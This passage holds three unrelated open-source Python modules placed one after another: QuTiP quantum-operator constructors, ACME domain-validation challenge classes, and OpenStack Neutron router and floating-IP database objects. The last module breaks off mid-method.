elif args[0] == 'z':
A = _jz(j)
else:
raise TypeError('Invalid type')
return Qobj(A)
def _jplus(j):
"""
Internal functions for generating the data representing the J-plus
operator.
"""
m = np.arange(j, -j - 1, -1, dtype=complex)
data = (np.sqrt(j * (j + 1.0) - (m + 1.0) * m))[1:]
N = m.shape[0]
ind = np.arange(1, N, dtype=np.int32)
ptr = np.array(list(range(N-1))+[N-1]*2, dtype=np.int32)
ptr[-1] = N-1
return fast_csr_matrix((data,ind,ptr), shape=(N,N))
def _jz(j):
"""
Internal functions for generating the data representing the J-z operator.
"""
N = int(2*j+1)
data = np.array([j-k for k in range(N) if (j-k)!=0], dtype=complex)
# Even shaped matrix
if (N % 2 == 0):
ind = np.arange(N, dtype=np.int32)
ptr = np.arange(N+1,dtype=np.int32)
ptr[-1] = N
# Odd shaped matrix
else:
j = int(j)
ind = np.array(list(range(j))+list(range(j+1,N)), dtype=np.int32)
ptr = np.array(list(range(j+1))+list(range(j,N)), dtype=np.int32)
ptr[-1] = N-1
return fast_csr_matrix((data,ind,ptr), shape=(N,N))
#
# Spin j operators:
#
def spin_Jx(j):
"""Spin-j x operator
Parameters
----------
j : float
Spin of operator
Returns
-------
op : Qobj
``qobj`` representation of the operator.
"""
return jmat(j, 'x')
def spin_Jy(j):
"""Spin-j y operator
Parameters
----------
j : float
Spin of operator
Returns
-------
op : Qobj
``qobj`` representation of the operator.
"""
return jmat(j, 'y')
def spin_Jz(j):
"""Spin-j z operator
Parameters
----------
j : float
Spin of operator
Returns
-------
op : Qobj
``qobj`` representation of the operator.
"""
return jmat(j, 'z')
def spin_Jm(j):
"""Spin-j annihilation operator
Parameters
----------
j : float
Spin of operator
Returns
-------
op : Qobj
``qobj`` representation of the operator.
"""
return jmat(j, '-')
def spin_Jp(j):
"""Spin-j creation operator
Parameters
----------
j : float
Spin of operator
Returns
-------
op : Qobj
``qobj`` representation of the operator.
"""
return jmat(j, '+')
def spin_J_set(j):
"""Set of spin-j operators (x, y, z)
Parameters
----------
j : float
Spin of operators
Returns
-------
list : list of Qobj
list of ``qobj`` representating of the spin operator.
"""
return jmat(j)
#
# Pauli spin 1/2 operators:
#
def sigmap():
"""Creation operator for Pauli spins.
Examples
--------
>>> sigmam()
Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = False
Qobj data =
[[ 0. 1.]
[ 0. 0.]]
"""
return jmat(1 / 2., '+')
def sigmam():
"""Annihilation operator for Pauli spins.
Examples
--------
>>> sigmam()
Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = False
Qobj data =
[[ 0. 0.]
[ 1. 0.]]
"""
return jmat(1 / 2., '-')
def sigmax():
"""Pauli spin 1/2 sigma-x operator
Examples
--------
>>> sigmax()
Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = False
Qobj data =
[[ 0. 1.]
[ 1. 0.]]
"""
return 2.0 * jmat(1.0 / 2, 'x')
def sigmay():
"""Pauli spin 1/2 sigma-y operator.
Examples
--------
>>> sigmay()
Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = True
Qobj data =
[[ 0.+0.j 0.-1.j]
[ 0.+1.j 0.+0.j]]
"""
return 2.0 * jmat(1.0 / 2, 'y')
def sigmaz():
"""Pauli spin 1/2 sigma-z operator.
Examples
--------
>>> sigmaz()
Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = True
Qobj data =
[[ 1. 0.]
[ 0. -1.]]
"""
return 2.0 * jmat(1.0 / 2, 'z')
#
# DESTROY returns annihilation operator for N dimensional Hilbert space
# out = destroy(N), N is integer value & N>0
#
def destroy(N, offset=0):
'''Destruction (lowering) operator.
Parameters
----------
N : int
Dimension of Hilbert space.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper : qobj
Qobj for lowering operator.
Examples
--------
>>> destroy(4)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = False
Qobj data =
[[ 0.00000000+0.j 1.00000000+0.j 0.00000000+0.j 0.00000000+0.j]
[ 0.00000000+0.j 0.00000000+0.j 1.41421356+0.j 0.00000000+0.j]
[ 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j 1.73205081+0.j]
[ 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j]]
'''
if not isinstance(N, (int, np.integer)): # raise error if N not integer
raise ValueError("Hilbert space dimension must be integer value")
data = np.sqrt(np.arange(offset+1, N+offset, dtype=complex))
ind = np.arange(1,N, dtype=np.int32)
ptr = np.arange(N+1, dtype=np.int32)
ptr[-1] = N-1
return Qobj(fast_csr_matrix((data,ind,ptr),shape=(N,N)), isherm=False)
#
# create returns creation operator for N dimensional Hilbert space
# out = create(N), N is integer value & N>0
#
def create(N, offset=0):
'''Creation (raising) operator.
Parameters
----------
N : int
Dimension of Hilbert space.
Returns
-------
oper : qobj
Qobj for raising operator.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Examples
--------
>>> create(4)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = False
Qobj data =
[[ 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j]
[ 1.00000000+0.j 0.00000000+0.j 0.00000000+0.j 0.00000000+0.j]
[ 0.00000000+0.j 1.41421356+0.j 0.00000000+0.j 0.00000000+0.j]
[ 0.00000000+0.j 0.00000000+0.j 1.73205081+0.j 0.00000000+0.j]]
'''
if not isinstance(N, (int, np.integer)): # raise error if N not integer
raise ValueError("Hilbert space dimension must be integer value")
qo = destroy(N, offset=offset) # create operator using destroy function
return qo.dag()
#
# QEYE returns identity operator for an N dimensional space
# a = qeye(N), N is integer & N>0
#
def qeye(N):
"""
Identity operator
Parameters
----------
N : int or list of ints
Dimension of Hilbert space. If provided as a list of ints,
then the dimension is the product over this list, but the
``dims`` property of the new Qobj are set to this list.
Returns
-------
oper : qobj
Identity operator Qobj.
Examples
--------
>>> qeye(3)
Quantum object: dims = [[3], [3]], \
shape = [3, 3], type = oper, isHerm = True
Qobj data =
[[ 1. 0. 0.]
[ 0. 1. 0.]
[ 0. 0. 1.]]
"""
if isinstance(N, list):
return tensor(*[identity(n) for n in N])
N = int(N)
if N < 0:
raise ValueError("N must be integer N>=0")
return Qobj(fast_identity(N), isherm=True)
def identity(N):
"""Identity operator. Alternative name to :func:`qeye`.
Parameters
----------
N : int or list of ints
Dimension of Hilbert space. If provided as a list of ints,
then the dimension is the product over this list, but the
``dims`` property of the new Qobj are set to this list.
Returns
-------
oper : qobj
Identity operator Qobj.
"""
return qeye(N)
def position(N, offset=0):
"""
Position operator x=1/sqrt(2)*(a+a.dag())
Parameters
----------
N : int
Number of Fock states in Hilbert space.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper : qobj
Position operator as Qobj.
"""
a = destroy(N, offset=offset)
return 1.0 / np.sqrt(2.0) * (a + a.dag())
def momentum(N, offset=0):
"""
Momentum operator p=-1j/sqrt(2)*(a-a.dag())
Parameters
----------
N : int
Number of Fock states in Hilbert space.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper : qobj
Momentum operator as Qobj.
"""
a = destroy(N, offset=offset)
return -1j / np.sqrt(2.0) * (a - a.dag())
def num(N, offset=0):
"""Quantum object for number operator.
Parameters
----------
N : int
The dimension of the Hilbert space.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper: qobj
Qobj for number operator.
Examples
--------
>>> num(4)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = True
Qobj data =
[[0 0 0 0]
[0 1 0 0]
[0 0 2 0]
[0 0 0 3]]
"""
if offset == 0:
data = np.arange(1,N, dtype=complex)
ind = np.arange(1,N, dtype=np.int32)
ptr = np.array([0]+list(range(0,N)), dtype=np.int32)
ptr[-1] = N-1
else:
data = np.arange(offset, offset + N, dtype=complex)
ind = np.arange(N, dtype=np.int32)
ptr = np.arange(N+1,dtype=np.int32)
ptr[-1] = N
return Qobj(fast_csr_matrix((data,ind,ptr), shape=(N,N)), isherm=True)
def squeeze(N, z, offset=0):
"""Single-mode Squeezing operator.
Parameters
----------
N : int
Dimension of hilbert space.
z : float/complex
Squeezing parameter.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper : :class:`qutip.qobj.Qobj`
Squeezing operator.
Examples
--------
>>> squeeze(4, 0.25)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = False
Qobj data =
[[ 0.98441565+0.j 0.00000000+0.j 0.17585742+0.j 0.00000000+0.j]
[ 0.00000000+0.j 0.95349007+0.j 0.00000000+0.j 0.30142443+0.j]
[-0.17585742+0.j 0.00000000+0.j 0.98441565+0.j 0.00000000+0.j]
[ 0.00000000+0.j -0.30142443+0.j 0.00000000+0.j 0.95349007+0.j]]
"""
a = destroy(N, offset=offset)
op = (1 / 2.0) * np.conj(z) * (a ** 2) - (1 / 2.0) * z * (a.dag()) ** 2
return op.expm()
def squeezing(a1, a2, z):
"""Generalized squeezing operator.
.. math::
S(z) = \\exp\\left(\\frac{1}{2}\\left(z^*a_1a_2
- za_1^\\dagger a_2^\\dagger\\right)\\right)
Parameters
----------
a1 : :class:`qutip.qobj.Qobj`
Operator 1.
a2 : :class:`qutip.qobj.Qobj`
Operator 2.
z : float/complex
Squeezing parameter.
Returns
-------
oper : :class:`qutip.qobj.Qobj`
Squeezing operator.
"""
b = 0.5 * (np.conj(z) * (a1 * a2) - z * (a1.dag() * a2.dag()))
return b.expm()
def displace(N, alpha, offset=0):
"""Single-mode displacement operator.
Parameters
----------
N : int
Dimension of Hilbert space.
alpha : float/complex
Displacement amplitude.
offset : int (default 0)
The lowest number state that is included in the finite number state
representation of the operator.
Returns
-------
oper : qobj
Displacement operator.
Examples
---------
>>> displace(4,0.25)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = False
Qobj data =
[[ 0.96923323+0.j -0.24230859+0.j 0.04282883+0.j -0.00626025+0.j]
[ 0.24230859+0.j 0.90866411+0.j -0.33183303+0.j 0.07418172+0.j]
[ 0.04282883+0.j 0.33183303+0.j 0.84809499+0.j -0.41083747+0.j]
[ 0.00626025+0.j 0.07418172+0.j 0.41083747+0.j 0.90866411+0.j]]
"""
a = destroy(N, offset=offset)
D = (alpha * a.dag() - np.conj(alpha) * a).expm()
return D
def commutator(A, B, kind="normal"):
"""
Return the commutator of kind `kind` (normal, anti) of the
two operators A and B.
"""
if kind == 'normal':
return A * B - B * A
elif kind == 'anti':
return A * B + B * A
else:
raise TypeError("Unknown commutator kind '%s'" % kind)
def qutrit_ops():
"""
Operators for a three level system (qutrit).
Returns
-------
opers: array
`array` of qutrit operators.
"""
from qutip.states import qutrit_basis
one, two, three = qutrit_basis()
sig11 = one * one.dag()
sig22 = two * two.dag()
sig33 = three * three.dag()
sig12 = one * two.dag()
sig23 = two * three.dag()
sig31 = three * one.dag()
return np.array([sig11, sig22, sig33, sig12, sig23, sig31],
dtype=object)
def qdiags(diagonals, offsets, dims=None, shape=None):
"""
Constructs an operator from an array of diagonals.
Parameters
----------
diagonals : sequence of array_like
Array of elements to place along the selected diagonals.
offsets : sequence of ints
Sequence for diagonals to be set:
- k=0 main diagonal
- k>0 kth upper diagonal
- k<0 kth lower diagonal
dims : list, optional
Dimensions for operator
shape : list, tuple, optional
Shape of operator. If omitted, a square operator large enough
to contain the diagonals is generated.
See Also
--------
scipy.sparse.diags for usage information.
Notes
-----
This function requires SciPy 0.11+.
Examples
--------
>>> qdiags(sqrt(range(1,4)),1)
Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isherm = False
Qobj data =
[[ 0. 1. 0. 0. ]
[ 0. 0. 1.41421356 0. ]
[ 0. 0. 0. 1.73205081]
[ 0. 0. 0. 0. ]]
"""
try:
data = sp.diags(diagonals, offsets, shape, format='csr', dtype=complex)
except:
raise NotImplementedError("This function requires SciPy 0.11+.")
if not dims:
dims = [[], []]
if not shape:
shape = []
return Qobj(data, dims, list(shape))
def phase(N, phi0=0):
"""
Single-mode Pegg-Barnett phase operator.
Parameters
----------
N : int
Number of basis states in Hilbert space.
phi0 : float
Reference phase.
Returns
-------
oper : qobj
Phase operator with respect to reference phase.
Notes
-----
The Pegg-Barnett phase operator is Hermitian on a truncated Hilbert space.
"""
phim = phi0 + (2.0 * np.pi * np.arange(N)) / N # discrete phase angles
n = np.arange(N).reshape((N, 1))
states = np.array([np.sqrt(kk) / np.sqrt(N) * np.exp(1.0j * n * kk)
for kk in phim])
ops = np.array([np.outer(st, st.conj()) for st in states])
return Qobj(np.sum(ops, axis=0))
def qzero(N):
"""
Zero operator
Parameters
----------
N : int or list of ints
Dimension of Hilbert space. If provided as a list of ints,
then the dimension is the product over this list, but the
``dims`` property of the new Qobj are set to this list.
Returns
-------
qzero : qobj
Zero operator Qobj.
"""
if isinstance(N, list):
return tensor(*[qzero(n) for n in N])
N = int(N)
if (not isinstance(N, (int, np.integer))) or N < 0:
raise ValueError("N must be integer N>=0")
return Qobj(sp.csr_matrix((N, N), dtype=complex), isherm=True)
def enr_destroy(dims, excitations):
"""
Generate annilation operators for modes in a excitation-number-restricted
state space. For example, consider a system consisting of 4 modes, each
with 5 states. The total hilbert space size is 5**4 = 625. If we are
only interested in states that contain up to 2 excitations, we only need
to include states such as
(0, 0, 0, 0)
(0, 0, 0, 1)
(0, 0, 0, 2)
(0, 0, 1, 0)
(0, 0, 1, 1)
(0, 0, 2, 0)
...
This function creates annihilation operators for the 4 modes that act
within this state space:
a1, a2, a3, a4 = enr_destroy([5, 5, 5, 5], excitations=2)
From this point onwards, the annihiltion operators a1, ..., a4 can be
used to setup a Hamiltonian, collapse operators and expectation-value
operators, etc., following the usual pattern.
Parameters
----------
dims : list
A list of the dimensions of each subsystem of a composite quantum
system.
excitations : integer
The maximum number of excitations that are to be included in the
state space.
Returns
-------
a_ops : list of qobj
A list of annihilation operators for each mode in the composite
quantum system described by dims.
"""
from qutip.states import enr_state_dictionaries
nstates, state2idx, idx2state = enr_state_dictionaries(dims, excitations)
a_ops = [sp.lil_matrix((nstates, nstates), dtype=np.complex)
for _ in range(len(dims))]
for n1, state1 in idx2state.items():
for n2, state2 in idx2state.items():
for idx, a in enumerate(a_ops):
s1 = [s for idx2, s in enumerate(state1) if idx != idx2]
s2 = [s for idx2, s in enumerate(state2) if idx != idx2]
if (state1[idx] == state2[idx] - 1) and (s1 == s2):
a_ops[idx][n1, n2] = np.sqrt(state2[idx])
return [Qobj(a, dims=[dims, dims]) for a in a_ops]
def enr_identity(dims, excitations):
"""
Generate the identity operator for the excitation-number restricted
state space defined by the `dims` and `exciations` arguments. See the
docstring for enr_fock for a more detailed description of these arguments.
Parameters
----------
dims : list
A list of the dimensions of each subsystem of a composite quantum
system.
excitations : integer
The maximum number of excitations that are to be included in the
state space.
state : list of integers
The state in the number basis representation.
Returns
-------
op : Qobj
A Qobj instance that represent the identity operator in the
exication-number-restricted state space defined by `dims` and
`exciations`.
"""
from qutip.states import enr_state_dictionaries
nstates, _, _ = enr_state_dictionaries(dims, excitations)
data = sp.eye(nstates, nstates, dtype=np.complex)
return Qobj(data, dims=[dims, dims])
def charge(Nmax, Nmin=None, frac = 1):
"""
Generate the diagonal charge operator over charge states
from Nmin to Nmax.
Parameters
----------
Nmax : int
Maximum charge state to consider.
Nmin : int (default = -Nmax)
Lowest charge state to consider.
frac : float (default = 1)
Specify fractional charge if needed.
Returns
-------
C : Qobj
Charge operator over [Nmin,Nmax].
Notes
-----
.. versionadded:: 3.2
"""
if Nmin is None:
Nmin = -Nmax
diag = np.arange(Nmin, Nmax+1, dtype=float)
if frac != 1:
diag *= frac
C = sp.diags(diag, 0, format='csr', dtype=complex)
return Qobj(C, isherm=True)
def tunneling(N, m=1):
"""
Tunneling operator with elements of the form
:math:`\sum |N><N+m| + |N+m><N|`.
Parameters
----------
N : int
Number of basis states in Hilbert space.
m : int (default = 1)
Number of excitations in tunneling event.
Returns
-------
T : Qobj
Tunneling operator.
Notes
-----
.. versionadded:: 3.2
"""
diags = [np.ones(N-m,dtype=int),np.ones(N-m,dtype=int)]
T = sp.diags(diags,[m,-m],format='csr', dtype=complex)
return Qobj(T, isherm=True)
# Break circular dependencies by a trailing import.
# Note that we use a relative import here to deal with that
# qutip.tensor is the *function* tensor, not the module.
from qutip.tensor import tensor
| |
"""ACME Identifier Validation Challenges."""
import binascii
import functools
import hashlib
import Crypto.Random
from acme import jose
from acme import other
# pylint: disable=too-few-public-methods
class Challenge(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge."""
TYPES = {}
class ContinuityChallenge(Challenge): # pylint: disable=abstract-method
"""Client validation challenges."""
class DVChallenge(Challenge): # pylint: disable=abstract-method
"""Domain validation challenges."""
class ChallengeResponse(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge response."""
TYPES = {}
@classmethod
def from_json(cls, jobj):
if jobj is None:
# if the client chooses not to respond to a given
# challenge, then the corresponding entry in the response
# array is set to None (null)
return None
return super(ChallengeResponse, cls).from_json(jobj)
@Challenge.register
class SimpleHTTP(DVChallenge):
"""ACME "simpleHttp" challenge."""
typ = "simpleHttp"
token = jose.Field("token")
@ChallengeResponse.register
class SimpleHTTPResponse(ChallengeResponse):
"""ACME "simpleHttp" challenge response."""
typ = "simpleHttp"
path = jose.Field("path")
tls = jose.Field("tls", default=True, omitempty=True)
URI_ROOT_PATH = ".well-known/acme-challenge"
"""URI root path for the server provisioned resource."""
_URI_TEMPLATE = "{scheme}://{domain}/" + URI_ROOT_PATH + "/{path}"
MAX_PATH_LEN = 25
"""Maximum allowed `path` length."""
@property
def good_path(self):
"""Is `path` good?
.. todo:: acme-spec: "The value MUST be comprised entirely of
characters from the URL-safe alphabet for Base64 encoding
[RFC4648]", base64.b64decode ignores those characters
"""
return len(self.path) <= 25
@property
def scheme(self):
"""URL scheme for the provisioned resource."""
return "https" if self.tls else "http"
def uri(self, domain):
"""Create an URI to the provisioned resource.
Forms an URI to the HTTPS server provisioned resource
(containing :attr:`~SimpleHTTP.token`).
:param str domain: Domain name being verified.
"""
return self._URI_TEMPLATE.format(
scheme=self.scheme, domain=domain, path=self.path)
@Challenge.register
class DVSNI(DVChallenge):
"""ACME "dvsni" challenge.
:ivar str r: Random data, **not** base64-encoded.
:ivar str nonce: Random data, **not** hex-encoded.
"""
typ = "dvsni"
DOMAIN_SUFFIX = ".acme.invalid"
"""Domain name suffix."""
R_SIZE = 32
"""Required size of the :attr:`r` in bytes."""
NONCE_SIZE = 16
"""Required size of the :attr:`nonce` in bytes."""
PORT = 443
"""Port to perform DVSNI challenge."""
r = jose.Field("r", encoder=jose.b64encode, # pylint: disable=invalid-name
decoder=functools.partial(jose.decode_b64jose, size=R_SIZE))
nonce = jose.Field("nonce", encoder=binascii.hexlify,
decoder=functools.partial(functools.partial(
jose.decode_hex16, size=NONCE_SIZE)))
@property
def nonce_domain(self):
"""Domain name used in SNI."""
return binascii.hexlify(self.nonce) + self.DOMAIN_SUFFIX
@ChallengeResponse.register
class DVSNIResponse(ChallengeResponse):
"""ACME "dvsni" challenge response.
:param str s: Random data, **not** base64-encoded.
"""
typ = "dvsni"
DOMAIN_SUFFIX = DVSNI.DOMAIN_SUFFIX
"""Domain name suffix."""
S_SIZE = 32
"""Required size of the :attr:`s` in bytes."""
s = jose.Field("s", encoder=jose.b64encode, # pylint: disable=invalid-name
decoder=functools.partial(jose.decode_b64jose, size=S_SIZE))
def __init__(self, s=None, *args, **kwargs):
s = Crypto.Random.get_random_bytes(self.S_SIZE) if s is None else s
super(DVSNIResponse, self).__init__(s=s, *args, **kwargs)
def z(self, chall): # pylint: disable=invalid-name
"""Compute the parameter ``z``.
:param challenge: Corresponding challenge.
:type challenge: :class:`DVSNI`
"""
z = hashlib.new("sha256") # pylint: disable=invalid-name
z.update(chall.r)
z.update(self.s)
return z.hexdigest()
def z_domain(self, chall):
"""Domain name for certificate subjectAltName."""
return self.z(chall) + self.DOMAIN_SUFFIX
@Challenge.register
class RecoveryContact(ContinuityChallenge):
"""ACME "recoveryContact" challenge."""
typ = "recoveryContact"
activation_url = jose.Field("activationURL", omitempty=True)
success_url = jose.Field("successURL", omitempty=True)
contact = jose.Field("contact", omitempty=True)
@ChallengeResponse.register
class RecoveryContactResponse(ChallengeResponse):
"""ACME "recoveryContact" challenge response."""
typ = "recoveryContact"
token = jose.Field("token", omitempty=True)
@Challenge.register
class RecoveryToken(ContinuityChallenge):
"""ACME "recoveryToken" challenge."""
typ = "recoveryToken"
@ChallengeResponse.register
class RecoveryTokenResponse(ChallengeResponse):
"""ACME "recoveryToken" challenge response."""
typ = "recoveryToken"
token = jose.Field("token", omitempty=True)
@Challenge.register
class ProofOfPossession(ContinuityChallenge):
"""ACME "proofOfPossession" challenge.
:ivar str nonce: Random data, **not** base64-encoded.
:ivar hints: Various clues for the client (:class:`Hints`).
"""
typ = "proofOfPossession"
NONCE_SIZE = 16
class Hints(jose.JSONObjectWithFields):
"""Hints for "proofOfPossession" challenge.
:ivar jwk: JSON Web Key (:class:`acme.jose.JWK`)
:ivar list certs: List of :class:`acme.jose.ComparableX509`
certificates.
"""
jwk = jose.Field("jwk", decoder=jose.JWK.from_json)
cert_fingerprints = jose.Field(
"certFingerprints", omitempty=True, default=())
certs = jose.Field("certs", omitempty=True, default=())
subject_key_identifiers = jose.Field(
"subjectKeyIdentifiers", omitempty=True, default=())
serial_numbers = jose.Field("serialNumbers", omitempty=True, default=())
issuers = jose.Field("issuers", omitempty=True, default=())
authorized_for = jose.Field("authorizedFor", omitempty=True, default=())
@certs.encoder
def certs(value): # pylint: disable=missing-docstring,no-self-argument
return tuple(jose.encode_cert(cert) for cert in value)
@certs.decoder
def certs(value): # pylint: disable=missing-docstring,no-self-argument
return tuple(jose.decode_cert(cert) for cert in value)
alg = jose.Field("alg", decoder=jose.JWASignature.from_json)
nonce = jose.Field(
"nonce", encoder=jose.b64encode, decoder=functools.partial(
jose.decode_b64jose, size=NONCE_SIZE))
hints = jose.Field("hints", decoder=Hints.from_json)
@ChallengeResponse.register
class ProofOfPossessionResponse(ChallengeResponse):
"""ACME "proofOfPossession" challenge response.
:ivar str nonce: Random data, **not** base64-encoded.
:ivar signature: :class:`~acme.other.Signature` of this message.
"""
typ = "proofOfPossession"
NONCE_SIZE = ProofOfPossession.NONCE_SIZE
nonce = jose.Field(
"nonce", encoder=jose.b64encode, decoder=functools.partial(
jose.decode_b64jose, size=NONCE_SIZE))
signature = jose.Field("signature", decoder=other.Signature.from_json)
def verify(self):
"""Verify the challenge."""
# self.signature is not Field | pylint: disable=no-member
return self.signature.verify(self.nonce)
@Challenge.register
class DNS(DVChallenge):
"""ACME "dns" challenge."""
typ = "dns"
token = jose.Field("token")
@ChallengeResponse.register
class DNSResponse(ChallengeResponse):
"""ACME "dns" challenge response."""
typ = "dns"
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
from neutron_lib.api.definitions import availability_zone as az_def
from neutron_lib.api.validators import availability_zone as az_validator
from oslo_versionedobjects import fields as obj_fields
import six
from sqlalchemy import func
from neutron.common import constants as n_const
from neutron.common import utils
from neutron.db.models import dvr as dvr_models
from neutron.db.models import l3
from neutron.db.models import l3_attrs
from neutron.db.models import l3agent as rb_model
from neutron.db import models_v2
from neutron.objects import base
from neutron.objects import common_types
@base.NeutronObjectRegistry.register
class RouterRoute(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = l3.RouterRoute
fields = {
'router_id': common_types.UUIDField(),
'destination': common_types.IPNetworkField(),
'nexthop': obj_fields.IPAddressField()
}
primary_keys = ['router_id', 'destination', 'nexthop']
foreign_keys = {'Router': {'router_id': 'id'}}
@classmethod
def modify_fields_from_db(cls, db_obj):
result = super(RouterRoute, cls).modify_fields_from_db(db_obj)
if 'destination' in result:
result['destination'] = utils.AuthenticIPNetwork(
result['destination'])
if 'nexthop' in result:
result['nexthop'] = netaddr.IPAddress(result['nexthop'])
return result
@classmethod
def modify_fields_to_db(cls, fields):
result = super(RouterRoute, cls).modify_fields_to_db(fields)
if 'destination' in result:
result['destination'] = cls.filter_to_str(result['destination'])
if 'nexthop' in result:
result['nexthop'] = cls.filter_to_str(result['nexthop'])
return result
@base.NeutronObjectRegistry.register
class RouterExtraAttributes(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = l3_attrs.RouterExtraAttributes
fields = {
'router_id': common_types.UUIDField(),
'distributed': obj_fields.BooleanField(default=False),
'service_router': obj_fields.BooleanField(default=False),
'ha': obj_fields.BooleanField(default=False),
'ha_vr_id': obj_fields.IntegerField(nullable=True),
'availability_zone_hints': obj_fields.ListOfStringsField(nullable=True)
}
primary_keys = ['router_id']
foreign_keys = {'Router': {'router_id': 'id'}}
@classmethod
def modify_fields_from_db(cls, db_obj):
result = super(RouterExtraAttributes, cls).modify_fields_from_db(
db_obj)
if az_def.AZ_HINTS in result:
result[az_def.AZ_HINTS] = (
az_validator.convert_az_string_to_list(
result[az_def.AZ_HINTS]))
return result
@classmethod
def modify_fields_to_db(cls, fields):
result = super(RouterExtraAttributes, cls).modify_fields_to_db(fields)
if az_def.AZ_HINTS in result:
result[az_def.AZ_HINTS] = (
az_validator.convert_az_list_to_string(
result[az_def.AZ_HINTS]))
return result
@classmethod
def get_router_agents_count(cls, context):
# TODO(sshank): This is pulled out from l3_agentschedulers_db.py
# until a way to handle joins is figured out.
binding_model = rb_model.RouterL3AgentBinding
sub_query = (context.session.query(
binding_model.router_id,
func.count(binding_model.router_id).label('count')).
join(l3_attrs.RouterExtraAttributes,
binding_model.router_id ==
l3_attrs.RouterExtraAttributes.router_id).
join(l3.Router).
group_by(binding_model.router_id).subquery())
query = (context.session.query(l3.Router, sub_query.c.count).
outerjoin(sub_query))
return [(router, agent_count) for router, agent_count in query]
@base.NeutronObjectRegistry.register
class RouterPort(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = l3.RouterPort
primary_keys = ['router_id', 'port_id']
foreign_keys = {'Router': {'router_id': 'id'}}
fields = {
'router_id': common_types.UUIDField(),
'port_id': common_types.UUIDField(),
'port_type': obj_fields.StringField(nullable=True),
}
@classmethod
def get_router_ids_by_subnetpool(cls, context, subnetpool_id):
query = context.session.query(l3.RouterPort.router_id)
query = query.join(models_v2.Port)
query = query.join(
models_v2.Subnet,
models_v2.Subnet.network_id == models_v2.Port.network_id)
query = query.filter(
models_v2.Subnet.subnetpool_id == subnetpool_id,
l3.RouterPort.port_type.in_(n_const.ROUTER_PORT_OWNERS))
query = query.distinct()
return [r[0] for r in query]
@base.NeutronObjectRegistry.register
class DVRMacAddress(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = dvr_models.DistributedVirtualRouterMacAddress
primary_keys = ['host']
fields = {
'host': obj_fields.StringField(),
'mac_address': common_types.MACAddressField()
}
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(DVRMacAddress, cls).modify_fields_from_db(db_obj)
if 'mac_address' in fields:
# NOTE(tonytan4ever): Here uses AuthenticEUI to retain the format
# passed from API.
fields['mac_address'] = utils.AuthenticEUI(fields['mac_address'])
return fields
@classmethod
def modify_fields_to_db(cls, fields):
result = super(DVRMacAddress, cls).modify_fields_to_db(fields)
if 'mac_address' in fields:
result['mac_address'] = cls.filter_to_str(result['mac_address'])
return result
@base.NeutronObjectRegistry.register
class Router(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = l3.Router
fields = {
'id': common_types.UUIDField(),
'project_id': obj_fields.StringField(nullable=True),
'name': obj_fields.StringField(nullable=True),
'status': common_types.RouterStatusEnumField(nullable=True),
'admin_state_up': obj_fields.BooleanField(nullable=True),
'gw_port_id': common_types.UUIDField(nullable=True),
'enable_snat': obj_fields.BooleanField(default=True),
'flavor_id': common_types.UUIDField(nullable=True),
}
@base.NeutronObjectRegistry.register
class FloatingIP(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = l3.FloatingIP
fields = {
'id': common_types.UUIDField(),
'project_id': obj_fields.StringField(nullable=True),
'floating_ip_address': obj_fields.IPAddressField(),
'floating_network_id': common_types.UUIDField(),
'floating_port_id': common_types.UUIDField(),
'fixed_port_id': common_types.UUIDField(nullable=True),
'fixed_ip_address': obj_fields.IPAddressField(nullable=True),
'router_id': common_types.UUIDField(nullable=True),
'last_known_router_id': common_types.UUIDField(nullable=True),
'status': common_types.FloatingIPStatusEnumField(nullable=True),
'dns': obj_fields.ObjectField('FloatingIPDNS', nullable=True),
}
fields_no_update = ['project_id', 'floating_ip_address',
'floating_network_id', 'floating_port_id']
synthetic_fields = ['dns']
@classmethod
def modify_fields_from_db(cls, db_obj):
result = super(FloatingIP, cls).modify_fields_from_db(db_obj)
if 'fixed_ip_address' in result:
result['fixed_ip_address'] = netaddr.IPAddress(
result['fixed_ip_address'])
if 'floating_ip_address' in result:
result['floating_ip_address'] = netaddr.IPAddress(
result['floating_ip_address'])
return result
@classmethod
def modify_fields_to_db(cls, fields):
result = super(FloatingIP, cls).modify_fields_to_db(fields)
if 'fixed_ip_address' in result:
